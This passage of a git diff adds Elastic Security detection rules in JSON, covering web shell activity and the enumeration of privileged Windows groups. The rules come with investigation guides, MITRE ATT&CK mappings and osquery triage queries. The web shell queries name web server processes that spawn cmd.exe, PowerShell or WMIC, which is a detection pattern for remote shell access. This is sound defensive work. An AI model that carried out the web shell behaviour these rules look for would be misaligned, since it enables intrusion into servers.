"type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "290aca65-e94d-403b-ba0f-62f320e63f51_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json new file mode 100644 index 00000000000..9bcb157abe5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json @@ -0,0 +1,166 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access.", + "false_positives": [ + "Security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Web Shell Detection: Script Process Child of Common Web Processes", + "note": "## Triage and analysis\n\n### Investigating Web Shell Detection: Script Process Child of Common Web Processes\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server.\n\nThis rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes.\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\") and\n not \n (\n process.parent.name : (\"php.exe\", \"httpd.exe\") and process.name : \"cmd.exe\" and\n process.command_line : (\n \"cmd.exe /c mode CON\",\n \"cmd.exe /s /c \\\"mode CON\\\"\",\n \"cmd.exe /c \\\"mode\\\"\",\n \"cmd.exe /s /c \\\"tput colors 2>&1\\\"\"\n )\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2917d495-59bd-4250-b395-c29409b76086", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2917d495-59bd-4250-b395-c29409b76086_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json new file mode 100644 index 00000000000..7b325998706 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json @@ -0,0 +1,166 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access.", + "false_positives": [ + "Security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Web Shell Detection: Script Process Child of Common Web Processes", + "note": "## Triage and analysis\n\n### Investigating Web Shell Detection: Script Process Child of Common Web Processes\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server.\n\nThis rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes.\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\") and\n not \n (\n process.parent.name : (\"php.exe\", \"httpd.exe\") and process.name : \"cmd.exe\" and\n process.command_line : (\n \"cmd.exe /c mode CON\",\n \"cmd.exe /s /c \\\"mode CON\\\"\",\n \"cmd.exe /c \\\"mode\\\"\",\n \"cmd.exe /s /c \\\"tput colors 2>&1\\\"\"\n )\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2917d495-59bd-4250-b395-c29409b76086", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2917d495-59bd-4250-b395-c29409b76086_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json new file mode 100644 index 00000000000..2069abaf9ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Privileged Local Groups Membership", + "new_terms_fields": [ + "host.id", + "winlog.event_data.SubjectUserName", + "winlog.event_data.CallerProcessName" + ], + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (\n winlog.event_data.SubjectUserName: *$ or\n winlog.event_data.SubjectUserSid: (\"S-1-5-19\" or \"S-1-5-20\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RuntimeBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "## Setup\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "291a0de9-937a-4189-94c0-3e847c8b13e4_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json new file mode 100644 index 00000000000..cfa07c738d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "winlog.event_data.CallerProcessName": { + "case_insensitive": true, + "value": "C:\\\\Program Files (x86)\\\\*.exe" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "winlog.event_data.CallerProcessName": { + "case_insensitive": true, + "value": "C:\\\\Program Files\\\\*.exe" + } + } + } + } + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Privileged Local Groups Membership", + "new_terms_fields": [ + "host.id", + "winlog.event_data.SubjectUserName", + "winlog.event_data.CallerProcessName" + ], + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN 